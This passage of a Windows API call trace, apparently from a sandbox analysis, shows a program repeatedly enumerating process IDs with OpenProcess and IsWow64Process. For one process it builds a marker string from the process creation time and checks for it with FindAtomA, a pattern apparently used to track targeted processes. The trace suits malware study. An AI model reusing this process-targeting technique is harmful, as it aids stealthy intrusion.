	[0076.193] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.194] CloseHandle (hObject=0x224) returned 1
	[0076.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.194] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.194] CloseHandle (hObject=0x224) returned 1
	[0076.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.194] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.194] CloseHandle (hObject=0x224) returned 1
	[0076.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.194] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.194] CloseHandle (hObject=0x224) returned 1
	[0076.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.194] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.194] CloseHandle (hObject=0x224) returned 1
	[0076.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.194] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.194] CloseHandle (hObject=0x224) returned 1
	[0076.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.194] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.194] CloseHandle (hObject=0x224) returned 1
	[0076.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.194] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.195] CloseHandle (hObject=0x224) returned 1
	[0076.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.195] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.195] CloseHandle (hObject=0x224) returned 1
	[0076.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.195] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.195] CloseHandle (hObject=0x224) returned 1
	[0076.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.195] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.195] CloseHandle (hObject=0x224) returned 1
	[0076.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.195] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.195] CloseHandle (hObject=0x224) returned 1
	[0076.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.195] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.195] CloseHandle (hObject=0x224) returned 1
	[0076.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.195] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.195] CloseHandle (hObject=0x224) returned 1
	[0076.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.196] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.196] CloseHandle (hObject=0x224) returned 1
	[0076.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.196] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.196] CloseHandle (hObject=0x224) returned 1
	[0076.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.196] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.196] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.196] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.196] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.196] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.196] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.197] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.197] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.197] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.197] CloseHandle (hObject=0x224) returned 1
	[0076.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.197] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.197] CloseHandle (hObject=0x224) returned 1
	[0076.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.197] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.197] CloseHandle (hObject=0x224) returned 1
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.287] CloseHandle (hObject=0x224) returned 1
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.288] CloseHandle (hObject=0x224) returned 1
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.288] CloseHandle (hObject=0x224) returned 1
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.288] CloseHandle (hObject=0x224) returned 1
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.288] CloseHandle (hObject=0x224) returned 1
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.288] CloseHandle (hObject=0x224) returned 1
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.288] CloseHandle (hObject=0x224) returned 1
	[0076.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.289] CloseHandle (hObject=0x224) returned 1
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.289] CloseHandle (hObject=0x224) returned 1
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.289] CloseHandle (hObject=0x224) returned 1
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.289] CloseHandle (hObject=0x224) returned 1
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.289] CloseHandle (hObject=0x224) returned 1
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.289] CloseHandle (hObject=0x224) returned 1
	[0076.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.290] CloseHandle (hObject=0x224) returned 1
	[0076.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.290] CloseHandle (hObject=0x224) returned 1
	[0076.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.290] CloseHandle (hObject=0x224) returned 1
	[0076.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.290] CloseHandle (hObject=0x224) returned 1
	[0076.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.290] CloseHandle (hObject=0x224) returned 1
	[0076.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.290] CloseHandle (hObject=0x224) returned 1
	[0076.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.290] CloseHandle (hObject=0x224) returned 1
	[0076.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.291] CloseHandle (hObject=0x224) returned 1
	[0076.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.291] CloseHandle (hObject=0x224) returned 1
	[0076.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.291] CloseHandle (hObject=0x224) returned 1
	[0076.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.291] CloseHandle (hObject=0x224) returned 1
	[0076.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.291] CloseHandle (hObject=0x224) returned 1
	[0076.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.291] CloseHandle (hObject=0x224) returned 1
	[0076.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.292] CloseHandle (hObject=0x224) returned 1
	[0076.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.292] CloseHandle (hObject=0x224) returned 1
	[0076.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.292] CloseHandle (hObject=0x224) returned 1
	[0076.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.292] CloseHandle (hObject=0x224) returned 1
	[0076.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.292] CloseHandle (hObject=0x224) returned 1
	[0076.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.293] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.293] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.293] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.293] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.293] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.293] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.293] CloseHandle (hObject=0x224) returned 1
	[0076.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.294] CloseHandle (hObject=0x224) returned 1
	[0076.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.294] CloseHandle (hObject=0x224) returned 1
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.371] CloseHandle (hObject=0x224) returned 1
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.371] CloseHandle (hObject=0x224) returned 1
	[0076.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.372] CloseHandle (hObject=0x224) returned 1
	[0076.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.372] CloseHandle (hObject=0x224) returned 1
	[0076.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.372] CloseHandle (hObject=0x224) returned 1
	[0076.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.372] CloseHandle (hObject=0x224) returned 1
	[0076.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.372] CloseHandle (hObject=0x224) returned 1
	[0076.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.373] CloseHandle (hObject=0x224) returned 1
	[0076.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.373] CloseHandle (hObject=0x224) returned 1
	[0076.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.373] CloseHandle (hObject=0x224) returned 1
	[0076.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.373] CloseHandle (hObject=0x224) returned 1
	[0076.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.373] CloseHandle (hObject=0x224) returned 1
	[0076.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.373] CloseHandle (hObject=0x224) returned 1
	[0076.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.374] CloseHandle (hObject=0x224) returned 1
	[0076.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.374] CloseHandle (hObject=0x224) returned 1
	[0076.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.374] CloseHandle (hObject=0x224) returned 1
	[0076.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.374] CloseHandle (hObject=0x224) returned 1
	[0076.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.374] CloseHandle (hObject=0x224) returned 1
	[0076.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.374] CloseHandle (hObject=0x224) returned 1
	[0076.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.375] CloseHandle (hObject=0x224) returned 1
	[0076.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.375] CloseHandle (hObject=0x224) returned 1
	[0076.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.375] CloseHandle (hObject=0x224) returned 1
	[0076.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.375] CloseHandle (hObject=0x224) returned 1
	[0076.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
